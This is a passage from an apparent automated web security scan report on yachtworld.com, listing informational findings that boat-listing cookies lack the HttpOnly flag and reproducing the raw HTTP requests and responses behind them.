User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.4.10.1296155835; yw_locale2=en_US; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); savedLabel0=24-32%20ft%2Cregulator%2CUsed%2C2004; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; latestSavedSearches=0_; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; s_pers=%20s_nr%3D1296156034601%7C1298748034601%3B%20s_lv%3D1296156034602%7C1390764034602%3B%20s_lv_s%3DFirst%2520Visit%7C1296157834602%3B; s_sess=%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dno%2520search%2520phrase%2520entered%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3D%3B; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.10.10.1296155952

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:20:14 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Tue, 18 Jan 2011 15:25:50 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 19:20:14 GMT
Set-Cookie: VIEWED_BOATS_STORE=2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 28971

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<t
...[SNIP]...

9.53. http://www.yachtworld.com/boats/2005/Regulator-32-Forward-Seating-2292192/Pt.-Pleasant/NJ/United-States previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/2005/Regulator-32-Forward-Seating-2292192/Pt.-Pleasant/NJ/United-States

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

VIEWED_BOATS_STORE=2292192%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B105%2C900%5B%25%5DPt.+Pleasant%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F9%2F2%2F1%2F2292192_1_mini.jpg%3F1291581360000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2292192%2FPt.-Pleasant%2FNJ%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 19:58:55 GMT
VIEWED_BOATS_STORE=2292192%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B105%2C900%5B%25%5DPt.+Pleasant%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F9%2F2%2F1%2F2292192_1_mini.jpg%3F1291581360000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2292192%2FPt.-Pleasant%2FNJ%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /boats/2005/Regulator-32-Forward-Seating-2292192/Pt.-Pleasant/NJ/United-States HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:58:55 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Sun, 05 Dec 2010 20:45:25 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=2292192%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B105%2C900%5B%25%5DPt.+Pleasant%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F9%2F2%2F1%2F2292192_1_mini.jpg%3F1291581360000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2292192%2FPt.-Pleasant%2FNJ%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 19:58:55 GMT
Set-Cookie: VIEWED_BOATS_STORE=2292192%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B105%2C900%5B%25%5DPt.+Pleasant%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F9%2F2%2F1%2F2292192_1_mini.jpg%3F1291581360000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2292192%2FPt.-Pleasant%2FNJ%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<t
...[SNIP]...

9.54. http://www.yachtworld.com/boats/2005/Regulator-32-Fs-1787065/Hilton-Head/SC/United-States previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/2005/Regulator-32-Fs-1787065/Hilton-Head/SC/United-States

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

VIEWED_BOATS_STORE=1787065%5B%25%5D32%27+Regulator+32+FS%5B%25%5DUSD%26nbsp%3B97%2C500%5B%25%5DHilton+Head%2C+SC%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F1%2F7%2F8%2F7%2F0%2F1787065_20_mini.jpg%3F1282081450000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-FS-1787065%2FHilton-Head%2FSC%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 19:58:56 GMT
VIEWED_BOATS_STORE=1787065%5B%25%5D32%27+Regulator+32+FS%5B%25%5DUSD%26nbsp%3B97%2C500%5B%25%5DHilton+Head%2C+SC%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F1%2F7%2F8%2F7%2F0%2F1787065_20_mini.jpg%3F1282081450000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-FS-1787065%2FHilton-Head%2FSC%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /boats/2005/Regulator-32-Fs-1787065/Hilton-Head/SC/United-States HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
